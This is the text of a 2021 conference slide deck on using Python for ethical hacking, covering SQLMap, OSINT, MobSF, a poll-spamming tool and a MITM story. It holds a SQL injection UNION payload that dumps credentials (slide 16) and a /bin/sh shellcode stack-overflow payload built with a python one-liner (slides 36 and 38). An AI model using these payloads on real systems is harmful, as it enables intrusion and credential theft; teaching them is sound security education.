Slide 1

Slide 1 text

The Importance of Python for Ethical Hacking Created by Yahya for PyCon ID 2021

Slide 2

Slide 2 text

!! DISCLAIMER !! - All on this presentation is for informational and educational purpose only, and for those who’re willing and curious to know and learn about Ethical Hacking, Security and Penetration Testing. - Any time the word “Hacking” that is used on this site shall be regarded as Ethical Hacking.The author is not promoted hacking or cracking. - Do not attempt to violate the law with anything contained here. - You shall not misuse the information to gain unauthorised access. However you may try out these hacks on your own computer at your own risk. Performing hack attempts (without permission) on computers that you do not own is illegal. Thanks to my wife and my friend that makes this presentation happen 2

Slide 3

Slide 3 text

Hello! I AM YAHYA F. ALFATIH Engineer Lead at eFishery Love to automate anything DevOps, SoftEng & CyberSec Researcher OSS&Web3 Enthusiast Creator of NeMo, BigBrother Test and other Junk 3 buk4nyahya A lazy abnormal tech savy. @BukanYahya k1m0ch1

Slide 4

Slide 4 text

2021 Hacking ? $2M bug bounty Profitable professional working on the internet (https://decrypt.co/83997/polygon-dodges-850m-hack-pays-re cord-2m-bounty) Cybercrime-as-service Crime as easy as you manage spreadsheet 4

Slide 5

Slide 5 text

5

Slide 6

Slide 6 text

Hacking & Ethical Hacking The differences where hackers activity is using ethic code or not Easy + Hack = Python The only language hackers commonly easy to use 6

Slide 7

Slide 7 text

Hackers really use python ? Really ? 7

Slide 8

Slide 8 text

Language used for exploit in exploit-db.com (from 45k record): 64 JAVA 1144 PHP 1894 HTML 2822 Perl 2956 C 3870 Python 1999+ Text 8

Slide 9

Slide 9 text

Tools pentesting on github commonly written with python 9

Slide 10

Slide 10 text

Also to proof the concept of CVE is widely written with python 10

Slide 11

Slide 11 text

So why hackers commonly use python ? Hacking Tools It is used by SQLMap, theHarvester and MobSF Productive & Speedy The most accessible programming languages available Wide Community Hackers community really can help with python Easy PoC Its not hard to Proof of Concept of the vulnerability or CVE ByteCode Shell Inject Fun with buffer0verlow ? try python For Fun! 🤣🤣🤣🤣 11

Slide 12

Slide 12 text

Hacking Tools Python as the swiss army Knife of hackers tools 12

Slide 13

Slide 13 text

Common Hackers tools written with python SQLMap theHarvester MobSF 13 This tools very common around hackers for sqlinjection, OSINT and debug the android apps

Slide 14

Slide 14 text

SQLMap - Automatic SQL Injection and database take over This tools can detect all of the variant of sql injection with more than 100 sql injection payload, it has more feature than that from explore database to dump the database 14

Slide 15

Slide 15 text

SQL injection there is an attack method that usually hackers use to trick the application to execute any command on the Database, from this kind of query that simply select the news like this 15 select * from news where news_id=5

Slide 16

Slide 16 text

SQL injection Into something that select other table, that store more sensitive information like this 16 select * from news where news_id=5 union select 1,2,concat(username,0x3a,password),4,5 from credentials This is only one variant of the sql injection from the 9 variant of sql injection with more than 100 sql injection payload, you can see full in here https://github.com/payloadbox/sql-injection-payload-list

Slide 17

Slide 17 text

Fix SQL injection Because sql injection is commonly involve with data input, so it is only need to sanitize the input, so the hackers can’t manipulate the query 17

Slide 18

Slide 18 text

theHarvester - the internet gold miner tools This is a very cool tools to dig a gold mine on the internet, the tools is simple, you just put the domain and it will search “ANY” information on the internet, even the sensitive one. How it work ? it is only use the search engine, from common search engine google, duck duck go, bing and the speciality search engine, GHDB, shodan and zoomeye and all of this commonly call OSINT 18

Slide 19

Slide 19 text

OSINT - Open Source Intelligence A process mostly used for collecting the publicly available source for intelligence context, you can try this by simply using the specific keyword on google or usually hackers call this GHDB (Google Hacking DB). Professionally a person who can do this is called the investigator 19

Slide 20

Slide 20 text

OSINT - Open Source Intelligence Why OSINT is so powerful ? 20

Slide 21

Slide 21 text

MobSF - Mobile Security Framework This tools can analyze, decompile, sniffing the API and do many things to analyze the Android application, it has a two great feature, Static Analysis and Dynamic Analysis 21

Slide 22

Slide 22 text

How Powerful MobSF ? I made the analysis of the Peduli Lindungi Application on twitter, github and youtube that peduli lindungi application actually send the “unusual” data to “untrusted tracker” 22

Slide 23

Slide 23 text

Automate & Proof of Concept Its easy to automate using python 23

Slide 24

Slide 24 text

Mentimeter - interactive tools to vote 24 Some people or group love to use this tools as interactive tools for voting or just some fun with group

Slide 25

Slide 25 text

Incognito browser to trick the sessions 25

Slide 26

Slide 26 text

Just request a new identifier 26

Slide 27

Slide 27 text

JEMAWA - menti spammer 27 https://github.com/k1m0ch1/jemawa-menti-choices-spammer

Slide 28

Slide 28 text

Inject shellcode into stack buffer overflow Python is pretty handy to inject some binary code into memory 28

Slide 29

Slide 29 text

29 kernel stack heap data text 0xffffff... 0x000... Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff...

Slide 30

Slide 30 text

30 Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff... 8 bytes 0x70 = p 0x61 = a 0x73 = s 0x73 = s 0x77 = w 0x6f = o 0x72 = r 0x64 = d

Slide 31

Slide 31 text

31 Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff...

Slide 32

Slide 32 text

32 Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff...

Slide 33

Slide 33 text

33 Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff... 0x7fffffffe490 - 0x7fffffffe4d8

Slide 34

Slide 34 text

34 Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff...

Slide 35

Slide 35 text

35 Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff...

Slide 36

Slide 36 text

36 Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff... 0x7fffffffed60 \x31\xc0\x48\xbb\xd1\x9d\x96\x91\x d0\x8c\x97\xff\x48\xf7\xdb\x53\x54\ x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0 f\x05 27 bytes shell code /bin/sh http://shell-storm.org/shellcode/files/shellcode-806.php $(python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7 \xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A" * 63')

Slide 37

Slide 37 text

37 Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff...

Slide 38

Slide 38 text

38 Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff... 0x7fffffffe480 0x7fffffffe480 \x80\xe4\xff\xff\xff\x7f Memory address $(python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7 \xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A" * 61 + “\x80\xe4\xff\xff\xff\x7f”’)

Slide 39

Slide 39 text

39 Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff... 0x7fffffffe480

Slide 40

Slide 40 text

40 Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff... 0x7fffffffe480

Slide 41

Slide 41 text

Demo the client server buffer overflow Using python 41

Slide 42

Slide 42 text

For Fun! The Strawberry Juice Day Everything is strawberry juice!! 42

Slide 43

Slide 43 text

43 Status Quo

Slide 44

Slide 44 text

44 Private Network and Public Network in the same network Call to the Adventure

Slide 45

Slide 45 text

45 Refusal of call

Slide 46

Slide 46 text

46 Meeting with the Mentor (MITM Attack)

Slide 47

Slide 47 text

47 Crossing the treshold

Slide 48

Slide 48 text

48

Slide 49

Slide 49 text

49 Test, Allies, Enemies

Slide 50

Slide 50 text

50 Test, Allies, Enemies

Slide 51

Slide 51 text

51 Test, Allies, Enemies

Slide 52

Slide 52 text

Approach the innermost cave 52

Slide 53

Slide 53 text

Ordeal 53

Slide 54

Slide 54 text

Ordeal 54

Slide 55

Slide 55 text

Ordeal 55

Slide 56

Slide 56 text

Reward 56

Slide 57

Slide 57 text

Reward 57

Slide 58

Slide 58 text

Road back 58

Slide 59

Slide 59 text

Return with elixir 59

Slide 60

Slide 60 text

The Bug and how to fix it 1. “REAL” Separate network 2. HTTPS EVERYWHERE, even LAN 3. Token Expiration 60

Slide 61

Slide 61 text

Hacking with Python is absolutely amazing 61

Slide 62

Slide 62 text

Thanks to! 62 Computerphile Youtube Channel Youtube videos about computer and internet stuff LiveOverflow Wannabe hacker.. Youtube video about various IT security topics Habibie Faried Hacker Buddy He mades a good article on medium https://habibiefaried.mediu m.com/ sec_r0 Gojektech security engineer He made a lot of cool stuff with his simple explanation image

Slide 63

Slide 63 text

Thanks! ANY QUESTIONS? You can find me at [email protected] 63 buk4nyahya @BukanYahya k1m0ch1 k1m0ch1